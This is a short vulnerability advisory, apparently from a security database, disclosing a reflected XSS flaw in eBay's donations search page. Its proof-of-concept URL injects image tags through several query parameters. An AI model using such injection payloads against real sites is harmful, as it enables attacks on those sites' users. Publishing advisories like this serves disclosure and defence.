donations.ebay.com XSS over 1 year 0day

2014-05-29 / 2014-05-30
Credit: Kacper
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

Reported and unpatched over 1yr! SHAME! [XSS] donations.ebay.com Author: Kacper WWW: https://devilteam.pl/ PoC: https://donations.ebay.com/donation/FNPController?ACTION=BrowseAction&SUB_ACTION=GetSearchResult&ebay_user_id=h1dddd&site_id=null&search_statement=1&v=e8b1e4e4e4e4fcb1b4b1b7b4b6b4b4b1b5b0b0b0fceed9abf3c8dab2d"><img src="http://www.freepasswordmanager.com/wp-content/uploads/2012/12/Youve_Been_Hacked.jpg">0f2c2ede4eab6f7d6eed9abf3c5dab2d0f2c1b2e4eab6c1c6ecb4e1e8c4b5e1c5f1c1abe4eab6f8b9eed9abf3e5d1bdbdfcb0&a="><img src="http://www.freepasswordmanager.com/wp-content/uploads/2012/12/Youve_Been_Hacked.jpg">&name="><img src="http://www.freepasswordmanager.com/wp-content/uploads/2012/12/Youve_Been_Hacked.jpg"> https://donations.ebay.com/donation/FNPController?ACTION=BrowseAction&SUB_ACTION=GetSearchResult&ebay_user_id=h1dddd&site_id=null&search_statement=1&v=e8b1e4e4e4e4fcb1b4b1b7b4b6b4b4b1b5b0b0b0fceed9abf3c8dab2d0f2c2ede4eab6f7d6eed9abf3c5dab2d0f2c1b2e4eab6c1c6ecb4e1e8c4b5e1c5f1c1abe4eab6f8b9eed9abf3e5d1bdbdfcb0&a="><img src="http://www.freepasswordmanager.com/wp-content/uploads/2012/12/Youve_Been_Hacked.jpg">&name="><img src="http://www.freepasswordmanager.com/wp-content/uploads/2012/12/Youve_Been_Hacked.jpg"> Reference: https://devilteam.pl/viewtopic.php?f=16&t=11554

References:

https://devilteam.pl/viewtopic.php?f=16&t=11554


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top